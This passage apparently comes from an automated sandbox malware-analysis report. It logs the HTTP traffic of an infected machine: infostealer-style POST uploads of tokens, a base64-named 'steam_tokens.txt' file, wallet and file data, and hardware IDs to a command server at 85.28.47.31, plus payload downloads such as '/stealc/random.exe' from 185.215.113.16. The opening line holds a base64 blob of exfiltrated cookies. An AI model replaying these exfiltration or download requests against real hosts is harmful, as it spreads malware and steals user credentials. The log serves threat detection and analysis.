name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file"------HDAKFCGIJKJKFHIDHIII--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIJJJKKJJDAKEBFIJDHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 4a 4a 4a 4b 4b 4a 4a 44 41 4b 45 42 46 49 4a 44 48 2d 2d 0d 0a Data Ascii: ------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHIJJJKKJJDAKEBFIJDHContent-Disposition: form-data; name="file"------FHIJJJKKJJDAKEBFIJDH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHIIJJECGDHIEGDAKHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------HIIIECAAKECFHIECBKJDContent-Disposition: form-data; name="message"wallets------HIIIECAAKECFHIECBKJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"ybncbhylepme------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="file"------JDBGDHIIDAEBFHJJDBFI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 2d 2d 0d 0a Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="message"files------KJECFHCBKKEBAKFIJDHI--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 34 33 36 34 66 31 65 64 66 63 31 33 62 36 33 62 38 34 32 65 63 38 39 33 34 36 37 64 38 36 63 35 31 64 33 34 38 38 32 34 39 32 34 62 30 33 39 66 61 31 64 35 62 39 32 65 36 61 61 64 63 61 34 39 63 32 31 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="token"c4364f1edfc13b63b842ec893467d86c51d348824924b039fa1d5b92e6aadca49c217d7b------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJECAAEHCFIEBGCBGHIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 31 32 35 45 38 39 44 38 30 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 2d 2d 0d 0a Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="hwid"B125E89D806E2371543510------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="build"sila------GIIJEBAECGCBKECAAAEB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
